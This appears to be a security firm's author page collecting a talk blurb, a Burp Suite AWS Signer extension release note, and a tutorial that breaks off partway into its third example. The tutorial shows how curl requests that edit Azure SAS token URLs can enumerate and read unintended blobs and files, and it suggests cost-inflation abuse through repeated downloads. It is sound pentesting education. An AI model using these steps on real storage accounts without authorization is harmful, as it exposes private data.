Jake Karnes

Jake has a B.S. in Computer Science from San Jose State University, and holds the GIAC Certified Incident Handler and Certified Ethical Hacker certifications. He specializes in web application penetration testing. Jake also contributes to the development of applications and tools for the NetSPI penetration testing team.
More by Jake Karnes
Persistence is Vital: Key Lessons Learned when Finding and Discovering CVE-2020-17049

Watch Now

NetSPI Managing Consultant Jake Karnes spoke at the CRESTCon UK 2022 conference at the Royal College of Physicians. During this session, Jake described how he found and responsibly disclosed a serious Microsoft vulnerability: the Kerberos Bronze Bit Attack.

Watch the recording below to:

  • Gain a high-level understanding of Kerberos and the Bronze Bit Attack
  • Get a behind-the-scenes look at the responsible vulnerability disclosure process
  • Apply the lessons Jake learned from a critical vulnerability finding to your own security testing practices

Watch the recording: https://youtu.be/aGiFRttHah4

Burp Suite Extension: AWS Signer 2.0 Release

Update April 20, 2022: The updated version of the AWS Signer extension is now available on the BApp Store. It can be installed or updated within Burp Suite through the Extender tab. Alternatively, the extension can be downloaded from the BApp Store here and installed manually.

+ + +

The AWS Signer extension enhances Burp Suite’s functionality for manipulating API requests sent to AWS services. As the requests pass through the proxy, the extension signs (or re-signs) them using user-supplied credentials and the AWS SigV4 algorithm. This allows the user to easily modify or replay a request in Burp Suite and ensure the AWS service accepts it. Eligible requests are automatically identified by the presence of the X-Amz-Date and Authorization headers.
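
As a point of reference, a SigV4-signed request carries headers along these lines (the request, host, date, and signature values below are illustrative placeholders, not output from the extension):

GET /?list-type=2 HTTP/1.1
Host: examplebucket.s3.us-east-1.amazonaws.com
X-Amz-Date: 20220331T120000Z
Authorization: AWS4-HMAC-SHA256 Credential=AKIAIOSFODNN7EXAMPLE/20220331/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-date, Signature=<64-character-hex-signature>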

The extension was initially released by NetSPI’s Eric Gruber in October 2017 and has been maintained by NetSPI’s Andrey Rainchik. It has served as a valuable tool on hundreds of penetration tests over the years. 

Today, I’m releasing version 2.0 which brings functional and usability improvements to the extension. An introduction to the enhancements is provided below. For more detailed information on how to use the extension, please see the updated documentation on GitHub.

The New Burp Suite Extension Interface

The most obvious difference upon loading the new version is that the extension’s UI tab in Burp Suite looks very different. All the key functionality from the original version of the extension remains.

This is the AWS Signer extension UI tab in Burp Suite.

At the top of the tab, we have “Global Settings,” which controls extension-wide behavior. The user can enable or disable the extension entirely through a checkbox. A user can also select a profile to use for signing all requests via the “Always Sign With” dropdown menu. If set, all eligible requests will be signed with the selected profile’s credentials. Speaking of profiles…

Introducing Profile Management

A profile represents a collection of settings for signing requests. As with the previous version of AWS Signer, a profile can specify which region and service should be used when signing a request, or that information can be extracted from the request itself via the Authorization header. The new version of the extension introduces import and export functionality for profiles. 

You Can Now Import Profiles from Multiple Sources

Upon clicking the Import button, a pop-up window will appear to guide the user through the import process. 

You can import profiles within Burp Suite using Auto, File, Env, and Clipboard.

Profiles can be imported from a variety of sources using the buttons at the top of the pop-up window:

  • Auto: Automatically sources profiles from default credential files (as used by the AWS CLI; an example file is shown after this list), the clipboard, and the following environment variables:
    • AWS_ACCESS_KEY_ID
    • AWS_SECRET_ACCESS_KEY
    • AWS_SESSION_TOKEN
  • File: Allows the user to specify which file to load profiles from. This is useful for importing previously exported profiles.
  • Env: Attempts to import a profile based on the standardized AWS CLI environment variables listed above.
  • Clipboard: Attempts to automatically recognize and import a profile based on credentials currently copied and held in the user's clipboard. 
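
As a sketch of what the Auto import reads, a minimal AWS CLI credentials file (typically ~/.aws/credentials; the profile names and values below are placeholders) looks like this:

[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[pentest-target]
aws_access_key_id = <access key>
aws_secret_access_key = <secret key>
aws_session_token = <session token>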

After sourcing the profiles, the user can select which ones to bring into the extension using the checkboxes beside each profile. 

Once the profiles are imported and configured by the user, all of the profiles can be easily exported to a file via the Export button. If working with a teammate, the exported profiles could be shared between multiple testers to reduce configuration time. This also allows for easily storing and restoring the extension’s configuration without including sensitive credentials within the project’s Burp Suite configuration. 

New: Profile Types

A key improvement in the latest version of the extension is the introduction of multiple profile types. Each profile type uses a different method for sourcing the credentials used to sign requests. There are currently three profile types, each of which is described below. 

Static Credentials Profile

This is the profile type that previous users of the extension will be most familiar with. The user simply provides an access key, a secret key and (optionally) a session token. When this profile is used to sign a request, these credentials are used to generate the signature.

AssumeRole Profile

The AssumeRole profile type allows the user to sign requests with the credentials that were returned after assuming an IAM role. The user must provide at least the following:

  1. The role ARN of the IAM role to assume.
  2. A profile that provides credentials to assume the role. This is referred to as the “Assumer Profile.”

When signing a request with an AssumeRole profile, the extension will first call the AssumeRole API using the Assumer profile to obtain an access key, secret key, and session token for the role. Using a profile (rather than static credentials) allows the extension to handle complex chaining of multiple profiles to fetch the necessary credentials. 

After retrieving the credentials, the extension will cache and reuse them to avoid continuously invoking the AssumeRole API. This is configurable through the Duration setting. The user may also provide a session policy to be applied when assuming the role. A session policy is an IAM policy, which can be used to further restrict the IAM permissions granted to a temporary session for a role. Session policies are useful for testing and confirming intended behavior with a specific policy because they are applied immediately upon the AssumeRole call with zero propagation delay and can be quickly modified. This eliminates the frustrating delays waiting for the eventual consistency of IAM permissions.

New AssumeRole profile in the AWS Signer.
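
For illustration, a session policy scoping a session down to read-only S3 actions might look like the following (this policy is a hypothetical example, not something shipped with the extension):

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": "*"
        }
    ]
}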

Command Profile

The final profile type allows the user to supply an OS command or external program that provides the signing credentials. The command will be executed using either cmd (Windows) or sh (non-Windows). The extension will attempt to parse the credentials from the command's stdout output. The output does not have a set format; credential extraction is based on pattern matching, and the extension is designed to recognize valid credentials in a variety of output formats. As with the AssumeRole profile, the returned credentials will be cached and reused where possible. The user can configure the lifetime of the credentials through the Duration field. For ease of testing, the UI also displays the latest credentials returned after clicking the “Test Profile Credentials” button.

The Command Profile type allows the user to provide an OS command or external program to provide the signing credentials.
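
As an example of a command a Command profile could wrap, the AWS CLI’s sts get-session-token prints temporary credentials as JSON, a shape the extension’s pattern matching should be able to recognize (the values below are placeholders):

aws sts get-session-token --output json
{
    "Credentials": {
        "AccessKeyId": "ASIA...",
        "SecretAccessKey": "<secret key>",
        "SessionToken": "<session token>",
        "Expiration": "2022-03-31T23:00:00+00:00"
    }
}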

Signing Improvements

The AWS Signer extension should properly sign well-formatted requests to any AWS service using SigV4. In older versions of the extension, some S3 API requests were not handled properly and would be rejected by the S3 service. The actual signing process is delegated to the AWS Java SDK, which should provide robust signing support for a wide variety of services and inputs. 

The extension also provides experimental support for SigV4a. At the time of writing, there is minimal published information about the SigV4a signing process. However, this functionality is available in the AWS Java SDK. As such, the AWS Signer extension attempts to recognize SigV4a requests and perform the proper signing process via the SDK. 

This is functional for the currently available multi-region access points in S3, which require SigV4a. However, as more information becomes available and as more services adopt this signing process, the extension may not handle all use cases.

Summary of Changes in Burp Suite Extension: AWS Signer 2.0

I sincerely hope you enjoy the changes in version 2.0 of the AWS Signer extension for Burp Suite. NetSPI will coordinate with PortSwigger to ensure this update is made available in the BApp Store as soon as possible. In the meantime, the update is available from the Releases page of the project’s GitHub repository. Please submit bug reports and feature requests as issues in GitHub and we’ll address them as we’re able. 

Want to pentest some of the most prominent and innovative organizations in the world? NetSPI is hiring! Visit our careers page to explore open security consultant roles.

Azure SAS Tokens for Web Application Penetration Testers

Let’s say you’re performing a web application penetration test and you see that the site links to a URL that looks like the following:

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sv=2020-08-04&ss=bf&srt=co&sp=rwl&se=2021-12-13T20:00:00Z&st=2021-11-01T07:00:00Z&spr=https&sig=ns2CRdy2Ijr04sHi%2FkNoRZu6mm1B5FSJCIzS21Uka1M%3D

Following that link, you can see that the content of testsastokenblob.txt is served to you. But do you realize that you’ve also been given access to list, read, and write all the blobs in the container? Do you realize that you’ve also been given access to the File service in the storage account? This blog will teach you what the above URL really is, how to understand each of its components, and how to identify opportunities for deeper access into an application’s cloud storage. 

TL;DR

For readers who recognize the above URL and are already familiar with the concept of Azure SAS tokens, feel free to jump to the examples section below. There are breakdowns and manipulations for the following scenarios:

  1. A user SAS with read and list permissions.
  2. An account SAS with read and list permissions for both the Blob and File services.
  3. A read-only account SAS and multiple storage containers.

If these are new concepts or you’d like a refresher on the details, continue below to learn more.

What is that URL anyway?

That URL is a shared access signature (SAS) which provides direct access to content stored in an Azure storage account. To understand its purpose, first consider a traditional web application with file uploads/downloads. This functionality needs to be built into the application itself, and all the content passes through the application on its way to the file system.

Shared access signatures provide an alternative for applications using Azure storage accounts. Rather than handling uploads/downloads within the application, the application authorizes the client to store, retrieve and manage content within the cloud storage directly. The SAS identifies the resource(s) to be accessed and includes the client’s proof of authorization.

Traditional versus Direct Cloud Storage

Breaking down the Shared Access Signature

When we come across a shared access signature on a pentest, we need to understand what access we’ve been granted. Almost all the information we need is provided in the SAS itself. But to best understand it, we’ll need to break it down and inspect each part. 

That long SAS is composed of two main parts:

  1. The Storage Resource URL:
    https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt
  2. The SAS Token:
    sv=2020-08-04&ss=bf&srt=co&sp=rwl&se=2021-12-13T20:00:00Z&st=2021-11-01T07:00:00Z&spr=https&sig=ns2CRdy2Ijr04sHi%2FkNoRZu6mm1B5FSJCIzS21Uka1M%3D

We’ll take a closer look at both of those halves. Let’s start with the storage resource URL.

The Storage Resource URL

The storage resource URL identifies the content within the storage account that will be accessed. This content may be a blob, directory, container, file, queue, or table. To identify which resource we’re given access to, we can break down this URL into two parts: the domain name and the URL path.  

The Domain Name

The domain name in the storage resource URL has the following format:
<storage_account_name>.<service_id>.core.windows.net

Let’s look at our example from earlier:
testsastokenaccount.blob.core.windows.net

We can identify that the storage account name is testsastokenaccount. While the SAS won’t provide access across storage accounts, the name itself can provide a starting place for guessing other valid storage accounts. For example, if our SAS pointed to companystorage1 or companystorage-prod, we may successfully guess that companystorage2 or companystorage-dev storage accounts exist. And if we’re truly lucky, those storage accounts may allow public access.
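
One lightweight way to test such guesses is DNS: a storage account’s hostname only resolves if the account actually exists (the account name below is one of the hypothetical guesses from above):

nslookup companystorage2.blob.core.windows.net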

The domain name also identifies the storage service that the SAS provides access to. The <service_id> placeholder can have one of the following values:

  1. blob: Azure Blob Storage
  2. file: Azure File Storage
  3. queue: Azure Queue Storage
  4. table: Azure Table Storage

One SAS token may provide access to multiple storage services within a storage account. This means that if our SAS authorizes us to perform List operations against a container in Blob storage, we should check if we can also perform List operations against directories in File storage. 

The URL Path

The URL path within the storage resource URL identifies a specific resource to be accessed. The same SAS token may provide access to multiple individual resources. For example, if the URL path within an SAS is /profile_pics/user1_profile.jpeg and we observe that our SAS token gives us Read access, then we could attempt to directly access other content by changing the URL path to /profile_pics/user2_profile.jpeg. If the SAS token doesn’t provide List access, then wordlists and context from the application itself will be the most helpful in finding other readable content.

The SAS Token

The SAS token is the second half of the shared access signature and authorizes the request to access the resources specified in the storage resource URL. The token is a series of URL parameters and values which define the constraints of that access. While there are many possible parameters that could be included, we’ll look at the most common and impactful here. 

Signed Permissions (sp)

The permissions granted by the SAS token are defined by the value of the sp parameter. Common values include: 

  • Create (c): Create a new resource.
  • Read (r): Read the resource.
  • Add (a): Add/append to an existing resource.
  • Write (w): Create or write a resource’s content and metadata.
  • Delete (d): Delete a resource.
  • List (l): List objects within a resource.
  • (And much more depending on the SAS type and storage service)

Values can also be combined to allow multiple actions. For example, sp=rl would allow for listing all objects within a resource (such as a container) and reading the contents of each of those objects. Even sp=rw could be abused by an attacker uploading a large file and then downloading it many times. This could easily rack up a large Azure bill through egress costs alone.  

This value should be inspected carefully, as the SAS token’s permissions may extend well beyond the functionality exposed within the application itself. 

Signed Services (ss)

The ss parameter is only included if the token belongs to an “account” SAS. An account SAS may provide access to one or more storage services. The value of the ss parameter defines which services a specific SAS token is authorized for. The allowed values are: 

  • Blob (b)
  • Queue (q)
  • Table (t)
  • File (f)

Values can also be combined to provide access to multiple services. For example, ss=bf allows access to the Blob and File services. If multiple values are specified for the ss parameter, be sure to attempt access to the different service endpoints using the domain names provided above.

Signed Resource Types (srt)

The SAS token is scoped to specific types of resources. If the SAS token belongs to an account SAS, the allowed resource types are defined by the value of the srt parameter. Allowed values include:

  • Service (s): Access to service-level APIs (e.g., Get/Set Service Properties, Get Service Stats, List Containers/Queues/Tables/Shares)
  • Container (c): Access to container-level APIs (e.g., Create/Delete Container, Create/Delete Queue, Create/Delete Table, Create/Delete Share, List Blobs/Files and Directories)
  • Object (o): Access to object-level APIs for blobs, queue messages, table entities, and files (e.g. Put Blob, Query Entity, Get Messages, Create File, etc.)

Like before, these values can be combined. For example, srt=co would provide permissions to both individual objects (e.g. blobs and files) and their logical parents (e.g. containers and directories).

Signed Resources (sr)

If the SAS token does not belong to an account SAS, then it belongs to a user SAS or service SAS. For our purposes, there are a couple important differences between these two SAS types and the account SAS type:

  1. A user SAS or service SAS can only provide access to a single service. A user SAS is limited to only the Blob service. A service SAS is limited to only one of the four storage services: Blob, File, Queue or Table.
  2. The permissions of a user SAS or service SAS may be more restricted than the SAS token suggests. The permissions of a user SAS are limited by the permissions of the user who signed the SAS. The permissions of a service SAS may be restricted by a stored access policy.

Because a user/service SAS is limited to a single service, the ss parameter will not be present in the SAS token. Additionally, the user/service token uses the sr parameter to define allowed resources, rather than the srt parameter. Some of the allowed values for the sr parameter are:

  • Blob (b): Grants access to the content and metadata of the blob.
  • Container (c): Grants access to the content and metadata of any blob in the container, and to the list of blobs in the container.
  • Directory (d): Grants access to the content and metadata of any blob in the directory, and to the list of blobs in the directory.
  • File (f): Grants access to the content and metadata of the file within the File service.
  • Share (s): Grants access to the content and metadata of any file in the share, and to the list of directories and files in the share, within the File service.

Signed Expiry (se)

The value of the se parameter defines when the SAS becomes invalid. Applications are allowed to set this very far into the future, even hundreds of years! While it may be convenient to avoid dealing with frequently generating new SAS tokens, there are a couple problems you may run into:

  1. The SAS may provide a malicious user long-term access into the storage account, even if that user is removed or banned from the application itself.
    1. This is especially dangerous if the application changes how it uses the storage account. For example, consider a web application that stores users’ public pictures in a storage account. Because these are all public pictures, the application hands out long-lived SAS tokens to all users allowing them to read all the blobs directly from cloud storage. Later, the web application rolls out a feature allowing users to store private pictures as well. If the application stores the private pictures in the same storage account, then the previously issued SAS tokens may allow users to access the private pictures as well. 
  2. SAS tokens can be difficult to revoke. Depending on the SAS type, revocation may require the storage account keys to be rotated. This would impact any existing use of those keys (such as other applications and other SAS tokens). 

Signed IP (sip)

The value of the sip parameter defines an IP address or range of addresses which are allowed to access the resources. The request to interact with the stored content must be received from one of these addresses, otherwise Azure will deny the request. If the same SAS works on one machine but not another, this could be the culprit. 

Signature (sig)

The above list of parameters is not exhaustive, and not all the parameters will be present in every SAS token. However, every SAS token is required to have the sig parameter. This is a Base64-encoded SHA256 HMAC which guarantees the integrity of the SAS token. Any changes we make to the SAS token will be detected through this signature, and our requests will be rejected. But keep in mind, we’re free to edit and manipulate the storage resource URL, so long as the SAS token remains unchanged. 
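
To see why tampering with the token fails, here is a minimal PowerShell sketch of how an account SAS signature is computed, assuming the documented account SAS string-to-sign layout (the account key below is a placeholder). Note that for an account SAS the storage resource URL is not part of the string-to-sign, which is exactly why we can manipulate the URL freely within the granted scope:

$accountName = "testsastokenaccount"
$accountKey  = "<base64-encoded storage account key>"
# Newline-delimited signed fields, in a fixed order defined by the service
$stringToSign = "$accountName`n" +          # account name
                "rl`n" +                    # sp  (signed permissions)
                "bf`n" +                    # ss  (signed services)
                "sco`n" +                   # srt (signed resource types)
                "2021-11-30T08:00:00Z`n" +  # st  (signed start)
                "2500-11-30T08:00:00Z`n" +  # se  (signed expiry)
                "`n" +                      # sip (signed IP, empty)
                "https`n" +                 # spr (signed protocol)
                "2020-08-04`n"              # sv  (signed version)
$hmac = New-Object System.Security.Cryptography.HMACSHA256
$hmac.Key = [Convert]::FromBase64String($accountKey)
# The Base64 output, URL-encoded, becomes the sig parameter
[Convert]::ToBase64String($hmac.ComputeHash([Text.Encoding]::UTF8.GetBytes($stringToSign)))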

Examples

Now that we understand the various components of a shared access signature, let’s take a look at a few examples. With each example, we’ll break down the SAS and see how we could abuse the access it grants us.

Example 1 – User SAS

Let’s say we encounter the following SAS during a pentest. What could we do with it?

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D

If we follow that link, we’re returned some simple content: 

curl "https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D"
Hello World

Having access to that content is fine (and likely required for the functionality of the web app we’re testing), but let’s see if this SAS gives us any more access. Let’s start by identifying our key components and seeing what information that gives us:

  • Resource URL
    • Domain Name: testsastokenaccount.blob.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
      • We can identify the container name: testsastokencontainer
      • We can identify a directory within the container: testsastokendirectory
      • We can identify the blob we’re accessing: testsastokenblob.txt
  • SAS Token:
    • Signed Permissions (sp): rwl
      • We’re authorized for read, write and list actions
    • Signed Resources (sr): c
      • We’re authorized to access the content and metadata of any blob in the container, and to the list of blobs in the container.
      • This is a user or service SAS, not an account SAS, because this parameter is present instead of the srt parameter.
    • Signed Expiry (se): 2021-12-07T08:00:00Z
      • The token is valid until this time. 
    • Signed Object Id (skoid): c7352c6b-06c4-40ce-9842-9dff0f004dbe
      • This is a required parameter for a user SAS, confirming the type of SAS. 
    • The additional values are required for the SAS token but are not very useful to us.

From this breakdown, we have a couple key takeaways:

  1. We have read, write and list permissions over the blobs within the testsastokencontainer container. 
  2. We have a user SAS which is limited to Blob storage and may be limited by the permissions of the principal which created the SAS. 

Let’s use our list permissions to find other blobs within the container. To do this, we need to make 2 edits to our original SAS:

  1. We need to change the path in the resource URL to only reference the container, not a specific blob.
    1. Original: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
    2. New: /testsastokencontainer
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the container: restype=container&comp=list

With both changes, our new SAS becomes:

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D

Let’s make a request to this URL (and nicely format the XML output):

curl -s "https://testsastokenaccount.blob.core.windows.net/testsas
tokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08
:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff
0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29
T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https
&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%
2FzPE5M%3D" | xmllint --format –
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.
blob.core.windows.net/" ContainerName="testsastokencontainer">
<Blobs>
<Blob>
<Name>testsastokendirectory/my_secret_file.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
<Blob>
<Name>testsastokendirectory/testsastokenblob.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
</Blobs>
<NextMarker/>
</EnumerationResults>
curl -s "https://testsastokenaccount.blob.core.windows.net/testsas tokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08 :00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff 0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29 T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https &sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC% 2FzPE5M%3D" | xmllint --format – <?xml version="1.0" encoding="utf-8"?> <EnumerationResults ServiceEndpoint="https://testsastokenaccount. blob.core.windows.net/" ContainerName="testsastokencontainer"> <Blobs> <Blob> <Name>testsastokendirectory/my_secret_file.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> <Blob> <Name>testsastokendirectory/testsastokenblob.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> </Blobs> <NextMarker/> </EnumerationResults>

In addition to the testsastokenblob.txt blob we already know about, the response also lists a my_secret_file.txt blob in the same directory. Because we have read access to all blobs in the container, we can update our SAS to reference this blob and read its contents:

curl "https://testsastokenaccount.blob.core.windows.net/testsastok
encontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=202
1-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce
-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=
2021-11-29T08:00:00Z&ske=20200:00Z&sks=b&skv=2020-08-04&spr=https&
sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2F
zPE5M%3D"
Username: user123
Password: password123
curl "https://testsastokenaccount.blob.core.windows.net/testsastok encontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=202 1-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce -9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt= 2021-11-29T08:00:00Z&ske=20200:00Z&sks=b&skv=2020-08-04&spr=https& sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2F zPE5M%3D" Username: user123 Password: password123

And just like that, we’ve taken our original SAS and abused our privileges to access content we aren’t intended to have. 

Example 2 – Account SAS

Let’s consider another SAS:

https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D

Again, we could follow the link to download the content:

curl "https://testsastokenaccount.file.core.windows.net/testfilesh
are/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=b
f&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&sp
r=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D"
Hello Again
curl "https://testsastokenaccount.file.core.windows.net/testfilesh are/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=b f&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&sp r=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D" Hello Again

Let’s perform the same breakdown as before to see what information the SAS itself provides:

  • Resource URL
    • Domain Name: testsastokenaccount.file.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for File storage: file.core.windows.net
    • URL Path: /testfileshare/testfilesharedirectory/testsastokenfile.txt
      • We can identify the share name: testfileshare
      • We can identify a directory within the share: testfilesharedirectory
      • We can identify the file we’re accessing: testsastokenfile.txt
  • SAS Token:
    • Signed Permissions (sp): rl
      • We’re authorized for read and list actions.
    • Signed Services (ss): bf
      • We’re authorized for the Blob and File services.
      • This must be an account SAS since it provides access to multiple services. 
    • Signed Resource Types (srt): sco
      • We’re authorized for all service-level, container-level and object-level APIs.
    • Signed Expiry (se): 2500-11-30T08:00:00Z
      • The token is valid for hundreds of years. 
    • The additional values are required for the SAS token but are not very useful to us.

Our key observations for this SAS are:

  1. We can read containers and objects across the File and Blob storage services. 
  2. We are using an account SAS which does not impose hidden restrictions. 
  3. We have a very long-lived SAS which can be used to persist access until the storage account keys are rotated.

Let’s get started using these privileges. As we saw in Example 1, we can update our SAS to list other files in the same file share and directory with the following changes:

  1. We need to change the path in the resource URL to only reference the directory, not a specific file.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /testfileshare/testfilesharedirectory
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the directory: restype=directory&comp=list

Like before, we’ll merge these changes into our SAS and check out the results:

curl -s 'https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/?restype=directory&comp=list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D' | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.file.core.windows.net/" ShareName="testfileshare" DirectoryPath="testfilesharedirectory/">
  <Entries>
    <File>
      <Name>another_secret_file.txt</Name>
      <Properties>
        <Content-Length>40</Content-Length>
      </Properties>
    </File>
    <File>
      <Name>testsastokenfile.txt</Name>
      <Properties>
        <Content-Length>11</Content-Length>
      </Properties>
    </File>
  </Entries>
  <NextMarker/>
</EnumerationResults>

And just like before, we see there are additional contents in the same directory (another_secret_file.txt). We can download this directly too by changing our original storage resource URL to point to that file, just like we did in Example 1. 

Since we have an account SAS with access to Blob storage, let’s utilize that access too! We’ll update our SAS to enumerate all blob storage containers within the storage account:

  1. We’ll need to change the domain name to reference the Blob service rather than File service.
    1. Original: file.core.windows.net
    2. New: blob.core.windows.net
  2. We need to remove the path in the resource URL since we’re interacting with the top-level service.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /
  3. We need to add the following URL parameters before or after the SAS token to list all containers: comp=list

We’ll merge in these changes, send off the request, and review the results:

curl -s 'https://testsastokenaccount.blob.core.windows.net/?comp=list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D' | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.blob.core.windows.net/">
  <Containers>
    <Container>
      <Name>secretcontainer</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
    </Container>
    <Container>
      <Name>testsastokencontainer</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
    </Container>
  </Containers>
  <NextMarker/>
</EnumerationResults>

Looking at the output, we see the storage container from Example 1 (testsastokencontainer) and we also see another storage container: secretcontainer. We’ve already seen how to edit the SAS to list blobs in a container and read individual blobs, so let’s take a peek at what’s inside:

curl -s 'https://testsastokenaccount.blob.core.windows.net/secretcontainer?restype=container&comp=list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D' | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.blob.core.windows.net/" ContainerName="secretcontainer">
  <Blobs>
    <Blob>
      <Name>last_secret_file.txt</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
      <OrMetadata/>
    </Blob>
  </Blobs>
  <NextMarker/>
</EnumerationResults>

curl -s 'https://testsastokenaccount.blob.core.windows.net/secretcontainer/last_secret_file.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D'
These are the super secret contents!

By analyzing and manipulating the original SAS for a specific file in the File storage service, we were able to pivot to the Blob storage service, find a new container and read the contents of a file within. 

Example 3 – Read-Only Account SAS

As a final example, let’s consider the following SAS:

https://otheraccount.blob.core.windows.net/container-dev/content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D

And the content provided by that SAS looks pretty mundane: 

